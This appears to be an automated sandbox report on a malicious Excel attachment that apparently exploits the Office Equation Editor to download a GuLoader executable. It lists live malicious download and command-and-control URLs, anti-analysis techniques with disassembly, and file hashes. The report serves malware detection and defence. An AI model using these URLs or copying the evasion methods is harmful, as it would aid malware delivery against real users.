Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.12.91.134	unknown	United States		36352	AS-COLOCROSSINGUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.12.91.134/win/vbc.exe	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://101.99.94.119/WEALTH_PRUu	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://198.12.91.134/win/vbc.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Multi AV Scanner detection for domain / URL

Source: http://198.12.91.134/win/vbc.exe

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 21%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 10%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 21%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 10%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUu

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.12.91.134 198.12.91.134

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.134

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC2566A.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC2566A.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5968 NtAllocateVirtualMemory,		6_2_003B5968
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A62 NtAllocateVirtualMemory,		6_2_003B5A62

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5968	6_2_003B5968
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B40B7	6_2_003B40B7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0211	6_2_003B0211
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4339	6_2_003B4339
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B443A	6_2_003B443A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B94D8	6_2_003B94D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B853B	6_2_003B853B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B05A1	6_2_003B05A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B85E7	6_2_003B85E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B95C6	6_2_003B95C6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B86F4	6_2_003B86F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B86DB	6_2_003B86DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5781	6_2_003B5781
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8802	6_2_003B8802
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2873	6_2_003B2873
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B891F	6_2_003B891F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1900	6_2_003B1900
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7A7A	6_2_003B7A7A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2A77	6_2_003B2A77
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A62	6_2_003B5A62
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0B59	6_2_003B0B59
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3BFF	6_2_003B3BFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0BDC	6_2_003B0BDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8C2C	6_2_003B8C2C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0CFA	6_2_003B0CFA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3CF2	6_2_003B3CF2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3CEF	6_2_003B3CEF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B	6_2_003B2D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5D78	6_2_003B5D78
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4DB6	6_2_003B4DB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1DA0	6_2_003B1DA0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0DD5	6_2_003B0DD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7E5C	6_2_003B7E5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1E99	6_2_003B1E99
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0ED2	6_2_003B0ED2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2FD3	6_2_003B2FD3

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Exhibitions Order Detailed list.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD539.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Exhibitions Order Detailed list.xlsx

Static file information: File size 1239040 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408873 push esp; ret	6_2_00408877
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004088C0 push esp; ret	6_2_004088CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004014E9 push es; ret	6_2_004014EA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408CB2 push esi; ret	6_2_00408CB3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040891C push esi; retf	6_2_0040892F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407D36 pushad ; iretd	6_2_00407D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408672 push esi; ret	6_2_00408677
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407E22 push ds; iretd	6_2_00407E27
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408624 push esp; ret	6_2_00408627
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408ADE push esi; retf	6_2_00408ADF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408695 push esi; ret	6_2_00408677
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B6625 push ebp; iretd	6_2_003B6637

Source: initial sample	Static PE information: section name: .text entropy: 7.07266809617
Source: initial sample	Static PE information: section name: .text entropy: 7.07266809617

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0B59	6_2_003B0B59
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0BDC	6_2_003B0BDC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0CFA	6_2_003B0CFA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B	6_2_003B2D3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0DD5	6_2_003B0DD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2FD3	6_2_003B2FD3

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0298 second address: 00000000003B0298 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7EAD second address: 00000000003B7EAD instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B9858 second address: 00000000003B9858 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B7CB5 second address: 00000000003B7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F1684EA0E03h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007F1684EA0DF9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007F1684EA0CFCh 0x00000063 call 00007F1684EA0D57h 0x00000068 call 00007F1684EA0E24h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B40B7 rdtsc

6_2_003B40B7

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1748

Thread sleep time: -240000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B40B7 rdtsc

6_2_003B40B7

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B73B4 mov eax, dword ptr fs:[00000030h]	6_2_003B73B4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3441 mov eax, dword ptr fs:[00000030h]	6_2_003B3441
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B853B mov eax, dword ptr fs:[00000030h]	6_2_003B853B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5589 mov eax, dword ptr fs:[00000030h]	6_2_003B5589
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7898 mov eax, dword ptr fs:[00000030h]	6_2_003B7898
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B mov eax, dword ptr fs:[00000030h]	6_2_003B2D3B

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	457915
Product:	CloudBasic
Start time:	14:49:13
Start date:	02.08.2021
Sample:	Exhibitions Order Detailed list.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	c8e623590aae92259642c8c80f761493
SHA1:	877da933e035b90f881d2c7ef3fa37f9065b6aa7
SHA256:	257645cd8e215cd4f9c2c153f3605e7389a2aed04a870a1aa0b4a4d9aa5762b3
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	27BF14807BC9D5CD2D823293F43C3A3A	08EEED11867AA351BE0D6C48DA283721EE6C0769	55FD5769DF0DF23D4140A34D07DC2C833B43AC1060F4D0992BDD27316041C69A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32A28A08.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52F13E97.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5868B96E.png	PNG image data, 779 x 181, 8-bit colormap, non-interlaced	871E67261292737F85DEE051B2EF5B1A	3108E69E8BEABB0CD820696E9F22889B5E7D3224	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DB07460.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\623BCD02.png	PNG image data, 687 x 111, 8-bit colormap, non-interlaced	A5D66CCBEE7946308A985B0FA9CC74F7	D86FFD2A310B16C59849B8E574B673E36643FDDF	6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DB428E1.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71EF57AC.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\855D19C5.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EA69F63.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	3F5F7384FF38DDA31633C2831A7ABC73	974D94DCD1F32FC128CCD43C30ECDDEDC0EA3BD2	3379A0A988A850FB15F4F961DADEA37C8A0098A1913AA986007092895731DA73
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A50033D4.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
